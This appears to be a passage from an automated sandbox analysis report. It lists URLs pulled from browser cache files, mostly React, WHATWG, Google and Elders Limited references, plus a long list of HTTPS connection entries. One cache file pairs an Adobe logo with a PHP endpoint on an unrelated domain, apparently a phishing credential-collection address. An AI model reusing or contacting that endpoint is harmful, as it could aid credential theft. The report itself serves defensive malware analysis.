      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/14365
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/16585
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/16734
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/1698
      Source: chromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/19099
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/19651
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://github.com/facebook/react/issues/20756
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/21712).
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/22459
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://github.com/facebook/react/issues/3236).
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/3877
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/6731#issuecomment-254874553
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/708.
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/7253
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/pull/10676.
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/pull/11157.
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/pull/13384
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/pull/19216.
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/pull/21666).
      Source: chromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/pull/22064.
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/pull/6896
      Source: chromecache_205.1.dr, chromecache_113.1.drString found in binary or memory: https://github.com/gnarf37/jquery-requestAnimationFrame
      Source: chromecache_164.1.dr, chromecache_139.1.drString found in binary or memory: https://github.com/microsoft/clarity
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/mozilla/gecko-dev/blob/4e638efc71/layout/style/test/property_database.js
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: https://github.com/select2/select2/blob/master/LICENSE.md
      Source: chromecache_118.1.dr, chromecache_170.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
      Source: chromecache_118.1.dr, chromecache_170.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: chromecache_188.1.drString found in binary or memory: https://goo.gl/maps/bBNFUxbFm24iPiek7
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/#do-not-apply
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#integration-with-idl
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/semantics.html#the-html-element
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#generate-implied-end-tags
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#has-an-element-in-button-scope
      Source: chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#has-an-element-in-scope
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#html-integration-point
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inbody
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-incaption
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-incolgroup
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inhead
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inselect
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intable
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intbody
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intd
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intr
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#special
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://infra.spec.whatwg.org/#ascii-tab-or-newline
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://infra.spec.whatwg.org/#c0-control-or-space
      Source: chromecache_126.1.drString found in binary or memory: https://kit.fontawesome.com/f6136e9b49.js
      Source: chromecache_126.1.drString found in binary or memory: https://logo.clearbit.com/$
      Source: chromecache_126.1.drString found in binary or memory: https://milo.za.com//pood/phpp4all.php
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: https://pagead2.googlesyndication.com
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
      Source: chromecache_184.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#cloneelement
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#createelement
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#isvalidelement
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#reactchildrencount
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#reactchildrenforeach
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#reactchildrenmap
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#reactchildrenonly
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://reactjs.org/docs/react-api.html#reactchildrentoarray
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/attribute-behavior
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/controlled-components
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/crossorigin-error
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/dangerously-set-inner-html
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/derived-state
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/error-boundaries
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/hooks-data-fetching
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/invalid-aria-props
      Source: chromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/invalid-hook-call
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/legacy-context
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/react-devtools
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/react-devtools-faq
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/react-polyfills
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/refs-must-have-owner
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/rules-of-hooks
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/setstate-in-render
      Source: chromecache_128.1.drString found in binary or memory: https://reactjs.org/link/special-props)
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/strict-mode-find-node
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/strict-mode-string-ref
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/switch-to-createroot
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/unsafe-component-lifecycles
      Source: chromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/warning-keys
      Source: chromecache_129.1.drString found in binary or memory: https://reactjs.org/link/wrap-tests-with-act
      Source: chromecache_112.1.dr, chromecache_145.1.drString found in binary or memory: https://rum.hlx.page
      Source: chromecache_161.1.drString found in binary or memory: https://schema.org/WPFooter
      Source: chromecache_184.1.drString found in binary or memory: https://support.google.com/recaptcha
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://support.google.com/recaptcha#6262736
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: https://tc39.github.io/ecma262/#sec-array.prototype.find
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: https://td.doubleclick.net
      Source: chromecache_161.1.drString found in binary or memory: https://twitter.com/elderslimited
      Source: chromecache_161.1.drString found in binary or memory: https://unpkg.com/react
      Source: chromecache_161.1.drString found in binary or memory: https://unpkg.com/react-dom
      Source: chromecache_126.1.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://url.spec.whatwg.org/#url-parsing
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://v8.dev/blog/elements-kinds#avoid-creating-holes
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://w3c.github.io/webcomponents/spec/custom/#custom-elements-core-concepts
      Source: chromecache_161.1.drString found in binary or memory: https://www.clarity.ms/tag/
      Source: chromecache_161.1.drString found in binary or memory: https://www.eldersinsurance.com.au/
      Source: chromecache_161.1.drString found in binary or memory: https://www.eldersinsurance.com.au/&#34;
      Source: chromecache_161.1.drString found in binary or memory: https://www.eldersrealestate.com.au/
      Source: chromecache_161.1.drString found in binary or memory: https://www.eldersrealestate.com.au/&#34;
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: https://www.google.com
      Source: chromecache_188.1.drString found in binary or memory: https://www.google.com/maps/embed?pb
      Source: chromecache_161.1.drString found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF
      Source: chromecache_138.1.dr, chromecache_165.1.dr, chromecache_184.1.dr, chromecache_137.1.drString found in binary or memory: https://www.google.com/recaptcha/api2/
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: https://www.googleadservices.com
      Source: chromecache_203.1.drString found in binary or memory: https://www.googletagmanager.com
      Source: chromecache_161.1.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
      Source: chromecache_161.1.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-MR5ZTSCQ
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__.
      Source: chromecache_138.1.dr, chromecache_137.1.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
      Source: chromecache_161.1.drString found in binary or memory: https://www.instagram.com/elders_limited/
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://www.quirksmode.org/blog/archives/2010/09/click_event_del.html
      Source: chromecache_161.1.drString found in binary or memory: https://www.youtube.com/user/EldersLimited
      Source: chromecache_198.1.drString found in binary or memory: https://yourir.info/
      Source: chromecache_198.1.drString found in binary or memory: https://yourir.info/api/v5
      Source: chromecache_198.1.drString found in binary or memory: https://yourir.info/lib/
      Source: unknownNetwork traffic detected: HTTP traffic on port 57680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 57886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57920 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 57931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57897 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57954 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57965 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57687
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57688
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57689
      Source: unknownNetwork traffic detected: HTTP traffic on port 57758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57694
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57695
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57696
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57697
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57690
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57691
      Source: unknownNetwork traffic detected: HTTP traffic on port 57838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57692
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57693
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57681 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57698
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57699
      Source: unknownNetwork traffic detected: HTTP traffic on port 57921 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57978 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 57895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 57785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 57905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57848 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57952 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57963 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57974 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57693 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57951 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57684 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57695 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57907 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57927
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57926
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57929
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57928
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57801
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57922
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57925
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57924
      Source: unknownNetwork traffic detected: HTTP traffic on port 57754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57921
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57920
      Source: unknownNetwork traffic detected: HTTP traffic on port 57811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57937 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57914 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57937
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57818
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57934
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57933
      Source: unknownNetwork traffic detected: HTTP traffic on port 57685 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57814
      Source: unknownNetwork traffic detected: HTTP traffic on port 57925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57935
      Source: unknownNetwork traffic detected: HTTP traffic on port 57868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57930
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57810
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57931
      Source: unknownNetwork traffic detected: HTTP traffic on port 57674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57948
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57709
      Source: unknownNetwork traffic detected: HTTP traffic on port 57984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57945
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57702
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57944
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57826
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57947
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57704
